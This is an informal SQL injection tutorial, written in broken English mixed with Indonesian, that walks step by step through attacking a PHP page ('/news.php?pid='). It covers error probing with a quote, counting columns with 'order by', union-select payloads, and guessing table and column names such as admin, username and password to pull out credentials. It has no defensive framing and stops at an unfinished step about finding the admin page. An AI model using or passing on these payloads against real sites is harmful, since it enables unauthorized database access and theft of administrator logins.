Simple Blind SQL Injection Method

--==[Langkah Pertama]==--

Find the target
ex: /news.php?pid=1
Add character ‘ at end of url to find error message.
ex: /news.php?pid=1′ atau
--==[step two]==--
find and count to amount the table in database.
use the command : order by
es: [site]/news.php?pid=-1+order+by+1–
chek step by step…
misal: /news.php?pid=-1+order+by+1–
so it appears error message or missing error…
ex: /news.php?pid=-1+order+by+5–
so that we take is up to number 4
ex: /news.php?pid=-1+order+by+4–
--==[step three]==--
for show the numbers that appear use the union
coz it error until 5
do this: /news.php?pid=-1+union+select+1,2,3,4–
--==[step four]==--
find the tabble
you can use your logic
example the table is
admin, admins, login, logins, user, users
use command +from+(table_name)–
ok do this
ex : /news.php?pid=-1+union+select+1,2,3,4+from+admin–
if not have error
and you can see the number is appear for example 2
go to the next step
--==[step five]==--
find the username & peassword coloumn
for username
use ur logic again
user, usr, username, user_name, login, user_admin, name, admin_user, and etc
last number 2 is appear
do this
ex : /news.php?pid=-1+union+select+1,username,3,4+from+admin–
example appear : admin
admin is username
for password
use ur logic again
password, pswd, passwd, pass, pwd, kunci, masuk, sandi, and etc
ex : /news.php?pid=-1+union+select+1,password,3,4+from+admin–
example appear : 123456
123456 is password
--==[step six]==--
ok in the last step you must find admin page
ex :
sorry bhs inggris hehehehe..

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